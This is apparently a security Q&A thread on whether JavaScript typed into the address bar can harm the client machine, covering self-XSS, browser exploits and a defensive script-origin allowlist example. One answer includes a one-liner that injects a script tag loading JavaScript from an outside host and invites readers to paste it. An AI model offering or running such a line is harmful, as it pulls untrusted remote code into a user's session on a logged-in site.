
Given the fact that modern browsers these days prohibit JavaScript from having access to any resources on the client's machine, does JavaScript execution from the address bar pose any threat at all to the client's machine (the machine the browser is running on)?

Anders
gurvinder372

2 Answers


JavaScript executed from the address bar will run in the context of the website displayed in that tab. This means complete access to that website, and it could change how the website looks and behaves from the point of view of the user.

This attack is called self XSS and can cause harm to the user and indirectly to the machine. A reputable website can ask the user to download and install a malicious piece of executable code by pretending, for example, that it needs a Flash update.

To get a nice visual example of this, manually type javascript: in your address bar and then paste this: z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); If you don't trust me, do it in the address bar of a website you are not logged in to.

Most browsers have realised this vulnerability and attempt to limit the impact by cutting out javascript: when pasting javascript:some_js_code in the address bar. But it is still possible to manually write it and execute it.

Cristian Dobre
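The remote-script injection shown in this answer is the kind of thing a site's own pages can at least notice. The following is an added example, not code from this answer, the question, or any browser: an allowlist check on script origins plus a reporting hook. ALLOWED_ORIGINS and the function names are assumptions for illustration, and the code only reports: a script element removed after insertion still runs, so actual blocking needs a Content-Security-Policy script-src directive.

```javascript
// Added example, not from the original answer: an allowlist check a site can run
// in its own pages to notice an injected remote <script> like the one above.
// ALLOWED_ORIGINS and the function names are assumptions for illustration.
const ALLOWED_ORIGINS = ['https://example.com', 'https://cdn.example.com']; // constructed

// True only if src resolves (relative to pageOrigin) to an http(s) URL whose
// origin is allowlisted. javascript:, data:, blob: and unparsable srcs are refused.
function isAllowedScriptSrc(src, pageOrigin, allowedOrigins = ALLOWED_ORIGINS) {
  if (typeof src !== 'string' || src.trim() === '') return false;
  let url;
  try {
    url = new URL(src, pageOrigin); // resolves '/app.js' and '//host/x.js' against the page
  } catch (e) {
    return false;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return false;
  return allowedOrigins.includes(url.origin); // exact origin match, not a substring match
}

// Given script records ({ src } objects, or real <script> elements), return those
// whose src lies outside the allowlist. Inline scripts (no src) are not judged here.
function findForeignScripts(scripts, pageOrigin, allowedOrigins = ALLOWED_ORIGINS) {
  return scripts.filter(s => {
    const src = typeof s.getAttribute === 'function' ? (s.getAttribute('src') || '') : (s.src || '');
    return src !== '' && !isAllowedScriptSrc(src, pageOrigin, allowedOrigins);
  });
}

// Browser side: report <script> elements added to the DOM from non-allowed origins.
// Detection only: removing a script element after insertion does not stop it running,
// so real blocking belongs to a Content-Security-Policy script-src directive.
function watchInjectedScripts(report = (src) => console.warn('Script from non-allowed origin:', src)) {
  if (typeof document === 'undefined' || typeof MutationObserver === 'undefined') return null;
  const observer = new MutationObserver(records => {
    const added = [];
    for (const r of records) for (const n of r.addedNodes) if (n.nodeName === 'SCRIPT') added.push(n);
    for (const s of findForeignScripts(added, document.location.origin)) report(s.getAttribute('src'));
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}
```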

I would like to complete the Accepted Answer from Cristian Dobre, which is correct but incomplete.

Executing JavaScript (whether it is via an address bar or via more classic means does not matter here) can, in some cases, lead to Remote Code Execution by exploiting buffer overflows (or similar flaws) in browsers. This is one of the reasons why patching browsers regularly is pretty important.

Such occurrences are rarely discovered in the wild but exist, and new ones are discovered every year (Chrome had less than Firefox which has WAY LESS than IE, in the past).

A good example here on SO: https://stackoverflow.com/questions/381171/help-me-understand-this-javascript-exploit

So, to answer your question: yes, it can harm a client's machine. If the machine is fully patched, only a zero-day (extremely unlikely yet still technically possible) could do such harm. Zero-days with such power are mostly, "luckily", used for targeted attacks to avoid attention and maximize the chances of non-detection (and, thus, future reuse).

niilzon
  • Can you please elaborate on `If the machine is fully patched`? – gurvinder372 Mar 29 '16 at 13:45
  • What I meant by "if the machine is fully patched" is: "if the browser is fully patched". In attacks like this, patching the OS makes no difference (even though unpatched OSes obviously open other attack vectors). Actually, but this is not specifically related to JavaScript, all browser plugins running some code one way or another (see: Java browser plugin, Flash) should be patched. If you take a look at the link in my response, you will see that this example leverages a bug in an IE lib. I don't know the details of that particular sample but I would guess that it works only with old IEs – niilzon Mar 29 '16 at 14:17
  • Actually modern browsers do use security provisions provided by the OS (such as running their rendering processes in low integrity mode in Windows) so patching the OS can make a big difference for exploits. Also any actual source for your claim that chrome has "WAY LESS [security exploits] than IE"? Or are we talking ancient past here? Because comparing IE11 CVE entries to Chrome shows a rather similar picture and IE + EMET is pretty much the most secure browser there is at the moment. – Voo Mar 30 '16 at 07:07
  • @Voo: my source for "Chrome has less than Firefox which has less than IE" is, for example for 2015, the results of the Pwn2Own contest http://www.zdnet.com/article/pwn2own-2015-the-year-every-browser-went-down/ As far as I remember, similar results come back every year. I must admit that I do not have a consolidated list of all such previously found exploits. – niilzon Mar 30 '16 at 07:24
  • @niilzon pwn2own just shows that every single browser got hacked. Which has happened for the last few years. Actually I can think of only a single prize not collected and that was in 2014 for IE11 with EMET (which had more to do with the fact that you could sell that exploit for quite a bit more to governments than that it was impossible). If you go by CVE entries, the different browsers seem rather similar for remote execution exploits and all around (as long as you stick with the latest versions of IE and don't throw the older ones in as well). – Voo Mar 30 '16 at 07:48